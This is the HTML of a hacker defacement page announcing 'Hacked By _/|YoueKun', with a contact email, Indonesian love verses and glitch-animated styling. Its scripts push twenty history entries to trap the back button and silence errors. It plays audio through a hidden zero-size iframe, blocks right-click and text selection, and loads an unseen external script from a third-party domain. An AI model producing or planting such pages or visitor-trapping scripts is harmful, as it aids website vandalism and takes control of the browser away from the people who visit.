
<html>
<head>
<link href="https://fonts.googleapis.com/css?family=Germania+One" rel="stylesheet">
<title> &#1203;&#824;&#1202;&#824;&#1203; Hacked By _/|YoueKun &#1203;&#824;&#1202;&#824;&#1203; </title>
<meta name="keywords" content="Youe-Kun" />
<meta name="author" content="D45H7">
<meta content='_/|YoueKun' name='Abstract'/>
<meta content='_/|YoueKun' name='subject'/>
<meta content='_/|YoueKun' name='copyright'/>
<meta name="robots" content="all" /> 
<meta name="robots schedule" content="auto" /> 
<meta name="distribution" content="global" /> 
<link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT0eEkBoLDr8Pl8wmqim7U27NScBNOKFm82OY4jfprrqQOuJvaJ" type="image/x-icon">
  <meta property="og:description" content="[+] D45H3xpl0it3r7 [+]"/>
<meta name="keywords" content="YoueKun">
<meta http-equiv="cache-control" content="index,cache"> 
<meta http-equiv="pragma" content="index,cache">
<iframe width="0" height="0" src="http://api.soundcloud.com/tracks/267941644/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen></iframe>
<script>
function ClearError() {return true;}window.onerror = ClearError;
	 (function () {
	 for(var i = 0; i < 20; i++) {
	 history.pushState(null, document.title, window.location.href );
	 }
	 })(document, window, history);
	 alert("Hi, :)");
</script>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<center>
<img width="300px" height="400px" src="https://i.pinimg.com/originals/22/53/61/225361d6cf17dd0ab25090c37b4d8ffe.png"/>
<br>
<h1>&#1203;&#824;&#1202;&#824;&#1203; Hacked By _/|YoueKun &#1203;&#824;&#1202;&#824;&#1203;</h1><br>
<br>
<font face="Shadows Into Light" color="black" size="5">Aku Menjagamu Sampai Dia Memilikimu :")<br>Aku Slalu Menunggumu Sampai Kamu Sadar<br>Bahwa Ada Orang Lain Yg Lebih Peduli Dengan Mu :)..</font></center>
	<br>
	<hr color="black" width="100%">
<font face="Shadows Into Light" size="4" color="black">Contact Me ?<br>[ L1nux3r69@gmail.com ]</font>
<br>
<font face="Shadows Into Light" color="black" size="4"> Copyright &copy; D45H3xpl0it3r7 2019</font>
<hr color="black" width="100%">
</center>
<style type="text/css">
@import url("http://fonts.googleapis.com/css?family=Germania+One|Shadows+Into+Light&display=swap");
body{
  	 font-family: "Monospace";
-webkit-background-size: cover;
background: url( ) no-repeat center center fixed;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-color: white;
color: white;
text-shadow: 0 0 2px #FF0000;
text-align: center;
height: 100%;
  	 }
  	 
h1{
	color: #000;
	text-decoration: none;
	border-radius:0px;
	border:0px;
	font-family: 'Shadows Into Light', cursive;
	font-size:50px;
	margin:0px auto;
	text-shadow:2px 2px #ff0000;
	animation:a 2s linear infinite;
}
.copyright{
position:absolute;
bottom:0px;
left:0px;
font-family:Ubuntu;
font-size:20px;
text-decoration:none;
}
.e{
color:#000;
text-decoration:none;
font-family: 'Germania One', cursive;
font-size:25px;
}
@keyframes a{
 3%{text-shadow:7px 7px 0px red;}
6%{text-shadow:-9px 4px 0px blue;transform:translate(4px,-10px) skewX(3240deg);}
7%{text-shadow:3px -4px 0px green;}
9%{text-shadow:0px 0px 3px white;transform:translate(0px,0px) skewX(0deg);}
2% , 54%{transform:translateX(0px) skew(0deg);}
55%{transform:translate(-2px,6px) skew(-5530deg);}
56%{text-shadow:0px 0px 3px white;transform:translate(0px,0px) skew(0deg);}
57%{text-shadow:7px 7px 0px red;transform:translate(4px,-10px) skew(-70deg);}
58%{text-shadow:0px 0px 3px white;transform:translate(0px,0px) skew(0deg);}
62%{text-shadow:3px -4px 0px green;transform:translate(0px,20px) skew(0deg);}
63%{text-shadow:0px 0px 3px white;transform:translate(4px,-2px) skew(0deg);}
64%{transform:translate(1px,3px); skew(-230deg);}
65%{transform:translate(-7px,2px); skew(120deg);}
66%{transform:translate(0px,0px) skew(0deg);}
</style>
<script src="http://e-mete.com/js/kdsnow.js" type="text/javascript"></script>
</body>
</html>
